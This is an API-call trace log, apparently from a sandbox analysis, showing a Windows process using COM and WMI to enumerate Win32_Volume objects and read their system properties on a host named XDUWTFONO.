	[0244.592] CoGetContextToken (in: pToken=0x5eadd28 | out: pToken=0x5eadd28) returned 0x0
	[0244.592] WbemLocator:IUnknown:QueryInterface (in: This=0x3adb44, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd10 | out: ppvObject=0x5eadd10*=0x3adaa4) returned 0x0
	[0244.592] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3adaa4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadd18 | out: pCid=0x5eadd18*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.592] WbemLocator:IUnknown:Release (This=0x3adaa4) returned 0x3
	[0244.592] CoGetContextToken (in: pToken=0x5eadd20 | out: pToken=0x5eadd20) returned 0x0
	[0244.592] WbemLocator:IUnknown:AddRef (This=0x3adb44) returned 0x4
	[0244.592] WbemLocator:IUnknown:QueryInterface (in: This=0x3adb44, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd94 | out: ppvObject=0x5eadd94*=0x3adb2c) returned 0x0
	[0244.592] WbemLocator:IUnknown:Release (This=0x3adb44) returned 0x4
	[0244.593] WbemLocator:IRpcOptions:Query (in: This=0x3adb2c, pPrx=0x3adb44, dwProperty=2, pdwValue=0x5eaddb8 | out: pdwValue=0x5eaddb8) returned 0x80004002
	[0244.593] WbemLocator:IUnknown:Release (This=0x3adb2c) returned 0x3
	[0244.593] WbemLocator:IUnknown:Release (This=0x3adb44) returned 0x2
	[0244.593] CoGetContextToken (in: pToken=0x5eae194 | out: pToken=0x5eae194) returned 0x0
	[0244.593] CoGetContextToken (in: pToken=0x5eae154 | out: pToken=0x5eae154) returned 0x0
	[0244.593] WbemLocator:IUnknown:AddRef (This=0x3adb44) returned 0x3
	[0244.593] WbemLocator:IUnknown:QueryInterface (in: This=0x3adb44, riid=0x5eae1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae1cc | out: ppvObject=0x5eae1cc*=0x626d464) returned 0x0
	[0244.593] WbemLocator:IUnknown:Release (This=0x3adb44) returned 0x3
	[0244.593] IUnknown:Release (This=0x626d464) returned 0x2
	[0244.593] IUnknown:Release (This=0x626d464) returned 0x1
	[0244.600] CoGetContextToken (in: pToken=0x5eae788 | out: pToken=0x5eae788) returned 0x0
	[0244.600] CoGetContextToken (in: pToken=0x5eae748 | out: pToken=0x5eae748) returned 0x0
	[0244.600] WbemLocator:IUnknown:AddRef (This=0x3adb44) returned 0x2
	[0244.600] WbemLocator:IUnknown:QueryInterface (in: This=0x3adb44, riid=0x5eae7c4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae7c0 | out: ppvObject=0x5eae7c0*=0x626d464) returned 0x0
	[0244.601] WbemLocator:IUnknown:Release (This=0x3adb44) returned 0x2
	[0244.601] IUnknown:AddRef (This=0x626d464) returned 0x3
	[0244.601] IEnumWbemClassObject:Reset (This=0x626d464) returned 0x0
	[0244.607] IUnknown:Release (This=0x626d464) returned 0x2
	[0244.613] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0244.613] IUnknown:AddRef (This=0x626d464) returned 0x3
	[0244.614] IEnumWbemClassObject:Next (in: This=0x626d464, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2e627b4 | out: apObjects=0x38ef70*=0x626d4a0, puReturned=0x2e627b4*=0x1) returned 0x0
	[0245.632] IUnknown:QueryInterface (in: This=0x626d4a0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc88 | out: ppvObject=0x5eadc88*=0x626d4a0) returned 0x0
	[0245.632] IUnknown:QueryInterface (in: This=0x626d4a0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc44 | out: ppvObject=0x5eadc44*=0x0) returned 0x80004002
	[0245.633] IUnknown:QueryInterface (in: This=0x626d4a0, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb38 | out: ppvObject=0x5eadb38*=0x0) returned 0x80004002
	[0245.633] IUnknown:AddRef (This=0x626d4a0) returned 0x3
	[0245.633] CoGetContextToken (in: pToken=0x5eadad0 | out: pToken=0x5eadad0) returned 0x0
	[0245.633] IUnknown:QueryInterface (in: This=0x626d4a0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x626d4a4) returned 0x0
	[0245.634] IMarshal:GetUnmarshalClass (in: This=0x626d4a4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadac0 | out: pCid=0x5eadac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0245.634] IUnknown:Release (This=0x626d4a4) returned 0x3
	[0245.634] CoGetContextToken (in: pToken=0x5eadac8 | out: pToken=0x5eadac8) returned 0x0
	[0245.634] IUnknown:AddRef (This=0x626d4a0) returned 0x4
	[0245.634] IUnknown:QueryInterface (in: This=0x626d4a0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb3c | out: ppvObject=0x5eadb3c*=0x0) returned 0x80004002
	[0245.634] IUnknown:Release (This=0x626d4a0) returned 0x3
	[0245.634] IUnknown:Release (This=0x626d4a0) returned 0x2
	[0245.634] CoGetContextToken (in: pToken=0x5eadf28 | out: pToken=0x5eadf28) returned 0x0
	[0245.634] CoGetContextToken (in: pToken=0x5eadee8 | out: pToken=0x5eadee8) returned 0x0
	[0245.634] IUnknown:AddRef (This=0x626d4a0) returned 0x3
	[0245.635] IUnknown:QueryInterface (in: This=0x626d4a0, riid=0x5eadf64*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eadf60 | out: ppvObject=0x5eadf60*=0x626d4a0) returned 0x0
	[0245.635] IUnknown:Release (This=0x626d4a0) returned 0x3
	[0245.635] IUnknown:Release (This=0x626d4a0) returned 0x2
	[0245.635] IUnknown:Release (This=0x626d4a0) returned 0x1
	[0245.635] IUnknown:Release (This=0x626d464) returned 0x2
	[0245.635] CoGetContextToken (in: pToken=0x5eae80c | out: pToken=0x5eae80c) returned 0x0
	[0245.635] IUnknown:AddRef (This=0x626d4a0) returned 0x2
	[0245.640] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__GENUS", lFlags=0, pVal=0x5eae888*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae93c*=0, plFlavor=0x5eae938*=0 | out: pVal=0x5eae888*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5eae93c*=3, plFlavor=0x5eae938*=64) returned 0x0
	[0245.640] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__PATH", lFlags=0, pVal=0x5eae868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae920*=0, plFlavor=0x5eae91c*=0 | out: pVal=0x5eae868*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x5eae920*=8, plFlavor=0x5eae91c*=64) returned 0x0
	[0245.640] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0245.641] CoGetObjectContext (in: riid=0x2e5da34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8c0 | out: ppv=0x5eae8c0*=0x2d8dec) returned 0x0
	[0245.641] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8b8 | out: pAptType=0x5eae8b8*=1) returned 0x0
	[0245.641] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2e5da1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8bc | out: ppvObject=0x5eae8bc*=0x0) returned 0x80004002
	[0245.641] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0245.641] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3d8 | out: ppv=0x5eae3d8*=0x626cb70) returned 0x0
	[0245.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x626cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae208 | out: ppvObject=0x5eae208*=0x0) returned 0x80004002
	[0245.642] WbemDefPath:IClassFactory:CreateInstance (in: This=0x626cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae240 | out: ppvObject=0x5eae240*=0x626d638) returned 0x0
	[0245.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d638, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadfe4 | out: ppvObject=0x5eadfe4*=0x626d638) returned 0x0
	[0245.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d638, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfa0 | out: ppvObject=0x5eadfa0*=0x0) returned 0x80004002
	[0245.643] WbemDefPath:IUnknown:AddRef (This=0x626d638) returned 0x3
	[0245.643] CoGetContextToken (in: pToken=0x5eade2c | out: pToken=0x5eade2c) returned 0x0
	[0245.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d638, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade14 | out: ppvObject=0x5eade14*=0x3a41d0) returned 0x0
	[0245.643] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3a41d0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade1c | out: pCid=0x5eade1c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0245.643] WbemDefPath:IUnknown:Release (This=0x3a41d0) returned 0x3
	[0245.643] CoGetContextToken (in: pToken=0x5eade24 | out: pToken=0x5eade24) returned 0x0
	[0245.643] WbemDefPath:IUnknown:AddRef (This=0x626d638) returned 0x4
	[0245.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d638, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade98 | out: ppvObject=0x5eade98*=0x0) returned 0x80004002
	[0245.643] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x3
	[0245.644] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x2
	[0245.644] WbemDefPath:IUnknown:Release (This=0x626cb70) returned 0x0
	[0245.644] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x1
	[0245.644] CoGetContextToken (in: pToken=0x5eae6d4 | out: pToken=0x5eae6d4) returned 0x0
	[0245.644] CoGetContextToken (in: pToken=0x5eae694 | out: pToken=0x5eae694) returned 0x0
	[0245.644] WbemDefPath:IUnknown:AddRef (This=0x626d638) returned 0x2
	[0245.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d638, riid=0x5eae710*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae70c | out: ppvObject=0x5eae70c*=0x626d638) returned 0x0
	[0245.645] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x2
	[0245.645] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x1
	[0245.645] CoGetContextToken (in: pToken=0x5eae754 | out: pToken=0x5eae754) returned 0x0
	[0245.645] CoGetContextToken (in: pToken=0x5eae714 | out: pToken=0x5eae714) returned 0x0
	[0245.645] WbemDefPath:IUnknown:AddRef (This=0x626d638) returned 0x2
	[0245.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x626d638, riid=0x5eae790*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae78c | out: ppvObject=0x5eae78c*=0x626d638) returned 0x0
	[0245.645] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x2
	[0245.645] WbemDefPath:IUnknown:AddRef (This=0x626d638) returned 0x3
	[0245.645] WbemDefPath:IWbemPath:SetText (This=0x626d638, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0245.646] WbemDefPath:IUnknown:Release (This=0x626d638) returned 0x2
	[0245.646] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae8f4 | out: puCount=0x5eae8f4*=0x2) returned 0x0
	[0245.646] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae8f0*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8f0*=0x17, pszText=0x0) returned 0x0
	[0245.646] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.646] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0245.646] IUnknown:AddRef (This=0x626d464) returned 0x3
	[0245.646] IEnumWbemClassObject:Next (in: This=0x626d464, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2e627b4 | out: apObjects=0x38ef70*=0x0, puReturned=0x2e627b4*=0x0) returned 0x1
	[0245.657] IUnknown:Release (This=0x626d464) returned 0x2
	[0245.658] CoGetContextToken (in: pToken=0x5eae7c4 | out: pToken=0x5eae7c4) returned 0x0
	[0245.658] WbemLocator:IUnknown:Release (This=0x3adb44) returned 0x1
	[0245.658] IUnknown:Release (This=0x626d464) returned 0x0
	[0245.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0245.717] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0245.717] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.717] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e63af4*=0, plFlavor=0x2e63af8*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2e63af4*=8, plFlavor=0x2e63af8*=64) returned 0x0
	[0245.717] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.717] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e63af4*=8, plFlavor=0x2e63af8*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2e63af4*=8, plFlavor=0x2e63af8*=64) returned 0x0
	[0245.717] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0245.718] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0245.718] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0245.718] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.718] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__CLASS", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e63bac*=0, plFlavor=0x2e63bb0*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2e63bac*=8, plFlavor=0x2e63bb0*=64) returned 0x0
	[0245.718] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.718] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__CLASS", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e63bac*=8, plFlavor=0x2e63bb0*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2e63bac*=8, plFlavor=0x2e63bb0*=64) returned 0x0
	[0245.718] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.726] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0245.726] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0245.726] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.726] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0245.726] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0245.726] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.726] IWbemClassObject:GetNames (in: This=0x626d4a0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5eae91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5eae8e8 | out: pNames=0x5eae8e8*="\x01ƀ\x04") returned 0x0
	[0245.730] SafeArrayGetDim (psa=0x3acd00) returned 0x1
	[0245.730] SafeArrayGetDim (psa=0x3acd00) returned 0x1
	[0245.730] SafeArrayGetLBound (in: psa=0x3acd00, nDim=0x1, plLbound=0x5eae4e4 | out: plLbound=0x5eae4e4) returned 0x0
	[0245.731] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__GENUS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e645ac*=0, plFlavor=0x2e645b0*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2e645ac*=3, plFlavor=0x2e645b0*=64) returned 0x0
	[0245.731] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__CLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e645e0*=0, plFlavor=0x2e645e4*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x2e645e0*=8, plFlavor=0x2e645e4*=64) returned 0x0
	[0245.731] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0245.731] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__SUPERCLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64634*=0, plFlavor=0x2e64638*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x2e64634*=8, plFlavor=0x2e64638*=64) returned 0x0
	[0245.731] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0245.731] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__DYNASTY", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64690*=0, plFlavor=0x2e64694*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x2e64690*=8, plFlavor=0x2e64694*=64) returned 0x0
	[0245.750] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0245.750] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__RELPATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e646fc*=0, plFlavor=0x2e64700*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x2e646fc*=8, plFlavor=0x2e64700*=64) returned 0x0
	[0245.750] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0245.750] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e647d0*=0, plFlavor=0x2e647d4*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x2e647d0*=3, plFlavor=0x2e647d4*=64) returned 0x0
	[0245.750] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__DERIVATION", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64804*=0, plFlavor=0x2e64808*=0 | out: pVal=0x5eae914*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3acd00*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x39c730, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x2e64804*=8200, plFlavor=0x2e64808*=64) returned 0x0
	[0245.751] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__SERVER", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e64968*=0, plFlavor=0x2e6496c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2e64968*=8, plFlavor=0x2e6496c*=64) returned 0x0
	[0245.751] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0245.751] IWbemClassObject:Get (in: This=0x626d4a0, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2e649b4*=0, plFlavor=0x2e649b8*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x2e649b4*=8, plFlavor=0x2e649b8*=64) returned 0x0
	[0245.752] SysStringLen (param_1="root\\cimv2") returned 0xa
